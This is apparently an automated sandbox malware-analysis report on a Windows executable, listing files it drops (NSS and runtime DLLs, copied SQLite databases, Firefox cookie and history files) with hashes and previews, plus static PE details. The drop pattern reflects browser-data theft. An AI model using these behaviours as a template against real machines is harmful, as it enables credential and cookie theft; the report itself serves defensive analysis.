SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\DBKKKEHDHCBFIEBFBGID

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	ASCII text, with very long lines (1809), with CRLF line terminators
Category:	dropped
Size (bytes):	9571
Entropy (8bit):	5.536643647658967
Encrypted:	false
SSDEEP:	192:qnaRt+YbBp6ihj4qyaaX86KKkfGNBw8DJSl:yegqumcwQ0
MD5:	5D8E5D85E880FB2D153275FCBE9DA6E5
SHA1:	72332A8A92B77A8B1E3AA00893D73FC2704B0D13
SHA-256:	50490DC0D0A953FA7D5E06105FE9676CDB9B49C399688068541B19DD911B90F9
SHA-512:	57441B4CCBA58F557E08AAA0918D1F9AC36D0AF6F6EB3D3C561DA7953ED156E89857FFB829305F65D220AE1075BC825F131D732B589B5844C82CA90B53AAF4EE
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "57f16a19-e119-4073-bf01-28f88011f783");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696333830);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696333856);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

C:\ProgramData\EBAKKFHJ

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\GIEHIDHJDBFIIECAKECB

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\JDHCBAEHJJJKKFIDGHJECAFIDA

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\JKEBFBFIEHIDAAAAFHCFCGIECB

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	5242880
Entropy (8bit):	0.037963276276857943
Encrypted:	false
SSDEEP:	192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
MD5:	C0FDF21AE11A6D1FA1201D502614B622
SHA1:	11724034A1CC915B061316A96E79E9DA6A00ADE8
SHA-256:	FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
SHA-512:	A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
Malicious:	false
Preview:	SQLite format 3......@ ...................&...................K..................................j.....-a>.~...\|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\KKFHJDAEHIEHJJKFBGDAKKKKEG

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	2.5793180405395284
Encrypted:	false
SSDEEP:	96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
MD5:	41EA9A4112F057AE6BA17E2838AEAC26
SHA1:	F2B389103BFD1A1A050C4857A995B09FEAFE8903
SHA-256:	CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
SHA-512:	29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\freebl3.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: 66fb252fe232b_Patksl.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\mozglue.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\msvcp140.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\ProgramData\nss3.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\softokn3.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\vcruntime140.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\freebl3[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\mozglue[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\msvcp140[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\nss3[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\softokn3[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\vcruntime140[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.94916371895131
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	1'830'912 bytes
MD5:	ee7da1cb43d37f296cc5c5915dbbfdcb
SHA1:	368daff2e29e2b86579f1df6d61e9d444f3b0e3c
SHA256:	a01200a5fdda2e012ca18c8971dafe8097c371beebdbbcd94a4c75590857d303
SHA512:	2dbfb38878b0b5140d741c1114447c2c502657ff6c8f4d5bf2cc9dd1632d1167fc6842b3aa0031cd09df730aed44f21ac2582dc2692166ead091e8b1e05fc733
SSDEEP:	24576:we/g4RWt3gg1MoemWCChH9SBW7tInwrqxABExIojVXlrBALiU0J7trPzBLRlB8be:hWt35ioiUB8aBgENlrntRRoIrYXl
TLSH:	018533580C23E379CB7E9B398F3D816F7DC6B68729F1C8943EB526E60943606E964124
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0xa93000
Entrypoint Section:	.taggant
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x66F99A4A [Sun Sep 29 18:19:54 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	2eabe9054cad5152567f0699947a2c5b

Entrypoint Preview

Instruction
jmp 00007F949851C30Ah
bswap esi
sbb eax, dword ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
jmp 00007F949851E305h
add byte ptr [0000000Ah], al
add byte ptr [eax], al
add byte ptr [eax], dl
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ebx], al
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [0300000Ah], al
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
